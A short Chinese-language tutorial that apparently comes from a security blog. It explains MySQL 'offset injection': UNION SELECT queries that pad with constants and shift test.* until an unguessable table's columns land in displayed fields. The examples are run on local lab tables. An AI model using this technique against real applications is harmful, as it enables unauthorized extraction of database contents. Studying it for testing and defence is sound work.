今天看到freebuff上有一篇位溢注入的,个人感觉和偏移注入差别不大
偏移注入适用情况:
- 目标表的字段无法被猜出,但是基本的id字段应该是可知的
- 当前可注入的表的字段数大于目标表
实验用到的两张表: 可注入的user表
+------+------+----------+-------+-------+---------+---------+------+
| id | user | pass | birth | phone | country | city | time |
+------+------+----------+-------+-------+---------+---------+------+
| 1 | user | userpass | 1999 | 13177 | cn | beijing | 9 |
+------+------+----------+-------+-------+---------+---------+------+
1 row in set (0.00 sec)
目标test表
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | test | test |
+----+----------+----------+
这里假设test里的字段除了id都是随机度非常高的不可测字符 那么根据union select的特性,下面语句可以被执行
mysql> select * from user union select 1,2,3,4,5,test.* from test;
+------+------+----------+-------+-------+---------+---------+------+
| id | user | pass | birth | phone | country | city | time |
+------+------+----------+-------+-------+---------+---------+------+
| 1 | user | userpass | 1999 | 13177 | cn | beijing | 9 |
| 1 | 2 | 3 | 4 | 5 | 1 | test | test |
+------+------+----------+-------+-------+---------+---------+------+
2 rows in set (0.00 sec)
mysql> select * from user union select 1,2,3,4,test.*,8 from test;
+------+------+----------+-------+-------+---------+---------+------+
| id | user | pass | birth | phone | country | city | time |
+------+------+----------+-------+-------+---------+---------+------+
| 1 | user | userpass | 1999 | 13177 | cn | beijing | 9 |
| 1 | 2 | 3 | 4 | 1 | test | test | 8 |
+------+------+----------+-------+-------+---------+---------+------+
mysql> select * from user union select 1,2,test.*,test.* from test;
+------+------+----------+-------+-------+---------+---------+------+
| id | user | pass | birth | phone | country | city | time |
+------+------+----------+-------+-------+---------+---------+------+
| 1 | user | userpass | 1999 | 13177 | cn | beijing | 9 |
| 1 | 2 | 1 | test | test | 1 | test | test |
+------+------+----------+-------+-------+---------+---------+------+
2 rows in set (0.00 sec)
2 rows in set (0.00 sec)
这里的移位的意思就是把test.*的内容,逐渐向前移动,直到移到回显数据的地方,其实这样看,这和access下的偏移注入没有太大的区别,少的只是后面的join连表而已